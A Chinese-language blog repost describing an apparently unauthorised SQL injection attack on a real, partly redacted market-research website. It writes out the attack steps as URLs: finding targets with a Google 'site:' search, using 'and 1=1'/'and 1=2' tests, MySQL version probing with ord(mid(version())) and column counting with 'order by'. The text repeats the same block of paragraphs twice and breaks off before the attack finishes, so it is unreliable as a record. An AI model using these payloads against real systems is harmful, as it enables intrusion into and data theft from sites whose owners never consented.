详述php渗透全过程(组图)
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
最近一直比较关注PHP注射的东西.学习好几天了.也应该实战一下了.目标http://app.xxxx. .一个市场调查的门户.找注射点嘛,还是要用我们可爱的搜索引擎.为什么可爱呢?一会就知道了.Go Go Go !!!!!
在google中搜索php?id= site:xxx..意思就是说搜索XXX网站中以php?id=的URL.嘿.还真让我找到一个. http://app.xxx./cati/article_literature.php?id=11 .打开吓我一条,它页面本身就存在错误直接出来了绝对路径.
500)this.width=500" title="点击这里用新窗口浏览图片" />
/data01//cati/article_literature.php 呵呵,人品爆发了..通过路径可以得知是台Linux主机.判断下是否可以进行注射.and 1=1返回正常,and 1=2返回错误..OK存在注射.然后我们判断数据库,不出意外应该是mysql.传说中的LMAP.环境(L=Linux M=Mysql A=Apache P=Php)
http://app.xxx./cati/article_literature.php?id=11/ 在后面加上/,返回正常则是Mysql.因为/是Mysql的注释标记.
500)this.width=500" title="点击这里用新窗口浏览图片" />
返回正常,确定是Mysql的数据库.现在我们来检测下Mysql的版本.4.0以上支持union联合查询.一般都回是4.0已经.为什么.因为Mysql是开源的数据库不收费傻子才不更新呢.呵呵.
http://app.xxx./cati/article_literature.php?id=11 and ord(mid(version(),1,1))>51/ 如我所料.果然是4.0以上的.OK.我们来爆它的字段.
http://app.xxx./cati/article_literature.php?id=11 order by 10
500)this.width=500" title="点击这里用新窗口浏览图片" />
返回错误,说明字段小于10
在google中搜索php?id= site:xxx..意思就是说搜索XXX网站中以php?id=的URL.嘿.还真让我找到一个. http://app.xxx./cati/article_literature.php?id=11 .打开吓我一条,它页面本身就存在错误直接出来了绝对路径.
500)this.width=500" title="点击这里用新窗口浏览图片" />
/data01//cati/article_literature.php 呵呵,人品爆发了..通过路径可以得知是台Linux主机.判断下是否可以进行注射.and 1=1返回正常,and 1=2返回错误..OK存在注射.然后我们判断数据库,不出意外应该是mysql.传说中的LMAP.环境(L=Linux M=Mysql A=Apache P=Php)
http://app.xxx./cati/article_literature.php?id=11/ 在后面加上/,返回正常则是Mysql.因为/是Mysql的注释标记.
500)this.width=500" title="点击这里用新窗口浏览图片" />
返回正常,确定是Mysql的数据库.现在我们来检测下Mysql的版本.4.0以上支持union联合查询.一般都回是4.0已经.为什么.因为Mysql是开源的数据库不收费傻子才不更新呢.呵呵.
http://app.xxx./cati/article_literature.php?id=11 and ord(mid(version(),1,1))>51/ 如我所料.果然是4.0以上的.OK.我们来爆它的字段.
http://app.xxx./cati/article_literature.php?id=11 order by 10
500)this.width=500" title="点击这里用新窗口浏览图片" />
返回错误,说明字段小于10
1
上一篇:入侵chinalinux站点技术指导
下一篇:对纵横时空文学站的一次安全检测
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座